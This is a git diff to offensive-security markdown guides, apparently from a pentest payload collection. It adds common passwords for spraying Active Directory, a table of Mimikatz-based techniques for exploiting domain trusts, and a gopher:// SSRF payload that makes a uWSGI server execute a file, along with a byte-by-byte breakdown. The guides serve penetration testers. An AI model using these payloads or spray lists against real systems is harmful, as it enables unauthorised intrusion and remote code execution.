diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 31265dec..0ec49c36 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern
 
 Most of the time the best passwords to spray are :
 
-- Password123
-- Welcome1
+- Password123, mimikatz
+- Welcome1/Welcome01
 - $Companyname1 : $Microsoft1
-- SeasonYear : Winter2019*
+- SeasonYear : Winter2019*,Spring2020!,Summer2018? 
 - Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
 
 #### Kerberos pre-auth bruteforcing
@@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
 
 ### Trust relationship between domains
 
+* One-way
+  * Domain B trusts A
+  * Users in Domain A can access resources in Domain B
+  * Users in Domain B cannot access resources in Domain A
+* Two-way
+  * Domain A trusts Domain B
+  * Domain B trusts Domain A
+  * Authentication requests can be passed between the two domains in both directions
+
+#### Enumerate trusts between domains
+
 ```powershell
 nltest /trusted_domains
 ```
@@ -1047,6 +1058,19 @@ SourceName          TargetName                    TrustType      TrustDirection
 domainA.local      domainB.local                  TreeRoot       Bidirectional
 ```
 
+#### Exploit trusts between domains
+
+:warning: Require a Domain-Admin level access to the current domain.
+
+| Source     | Target  | Technique to use  | Trust relationship  |
+|---|---|---|---|
+| Root      | Child  | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way)  |
+| Child     | Child  | SID History exploitation (Mimikatz /sids)                 | Inter Realm Parent-Child (2-way)  |
+| Child     | Root   | SID History exploitation (Mimikatz /sids)                 | Inter Realm Tree-Root (2-way)  |
+| Forest A  | Forest B  | PrinterBug + Unconstrained delegation ?  | Inter Realm Forest or External (2-way)  |
+
+
+
 ### Child Domain to Forest Compromise - SID Hijacking
 
 Most trees are linked with dual sided trust relationships to allow for sharing of resources.
@@ -1498,4 +1522,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
-* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
\ No newline at end of file
+* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
+* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 88e7db0f..46cb2f3b 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -29,6 +29,7 @@
   * [ldap://](#ldap)
   * [gopher://](#gopher)
   * [netdoc://](#netdoc)
+* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
 * [SSRF to XSS](#ssrf-to-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
@@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
 ssrf.php?url=gopher://127.0.0.1:4242/DATA
 ```
 
+## SSRF exploiting WSGI
+
+Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
+
+```powershell
+gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
+```
+
+| Header    |           |             |
+|-----------|-----------|-------------|
+| modifier1 | (1 byte)  | 0 (%00)     |
+| datasize  | (2 bytes) | 26 (%1A%00) |
+| modifier2 | (1 byte)  | 0 (%00)     |
+
+| Variable (UWSGI_FILE) |           |    |            |   |
+|-----------------------|-----------|----|------------|---|
+| key length            | (2 bytes) | 10 | (%0A%00)   |   |
+| key data              | (m bytes) |    | UWSGI_FILE |   |
+| value length          | (2 bytes) | 12 | (%0C%00)   |   |
+| value data            | (n bytes) |    | /tmp/test.py   |   |
+	
+
 ## SSRF to XSS 
 
 by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)